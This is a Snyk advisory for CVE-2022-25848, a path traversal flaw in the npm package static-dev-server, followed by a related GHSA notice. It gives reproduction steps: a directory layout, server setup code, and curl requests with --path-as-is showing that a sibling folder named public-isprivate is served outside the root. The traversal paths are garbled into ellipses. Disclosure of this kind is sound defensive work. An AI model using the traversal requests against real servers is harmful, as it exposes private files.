CVE-2022-25848: Snyk Vulnerability Database | Snyk

This affects all versions of package static-dev-server. This is because when paths from users to the root directory are joined, the assets for the path accessed are relative to that of the root directory.

Steps to reproduce:

  1. Install the latest version of static-dev-server: npm install [email protected]

  2. Make sure you have a public/ directory with files in it.

  3. Make sure you have a public-isprivate/ directory with files in it.

  4. Make sure you have a private/ directory with files in it.

  5. All directories above should share the same relative parent, meaning the directory structure should look as follows:

.
├── private
│   └── index.html
├── public
│   └── index.html
└── public-isprivate
    └── index.html

Then, run a server powered by static-dev-server as follows:

var StaticServer = require('static-dev-server');
var server = new StaticServer({
  rootPath: 'public',       // required, the root of the server file tree
  name: 'my-http-server',   // optional, will set "X-Powered-by" HTTP header
  port: 3000,               // optional, defaults to a random port
  host: '0.0.0.0',          // optional, defaults to any interface
  cors: '*',                // optional, defaults to undefined
  followSymlink: true,      // optional, defaults to a 404 error
  templates: {
    index: 'foo.html',      // optional, defaults to 'index.html'
    notFound: '404.html'    // optional, defaults to undefined
  }
});

// Start listening. This call is not in the advisory's original snippet; it
// assumes static-dev-server keeps the start() method of the static-server
// API whose options the object above mirrors.
server.start(function () {
  console.log('Server listening on port 3000');
});

This sets the server's root to the public/ directory created earlier. Run the server from the local folder in which private/, public/ and public-isprivate/ are subfolders.

Next, verify the following:

  1. curl --path-as-is "http://localhost:3000/…/private/index.html" -> this request is denied, as expected with the prior vulnerability fix.

  2. curl --path-as-is "http://localhost:3000/…/public/index.html" -> this request is allowed, as expected from the functionality of this local HTTP server.

  3. curl --path-as-is "http://localhost:3000/…/public-isprivate/index.html" -> this request SHOULD BE DENIED because it is outside the public/ folder, but it is actually allowed.

Case (3) shouldn’t happen, but it does, due to an improper fix in the library’s source code.

Related news

GHSA-7fxm-c848-89q8: static-dev-server vulnerable to path traversal

This affects all versions of package static-dev-server. This is because when paths from users to the root directory are joined, the assets for the path accessed are relative to that of the root directory. There is currently no known workaround or fix for this issue.
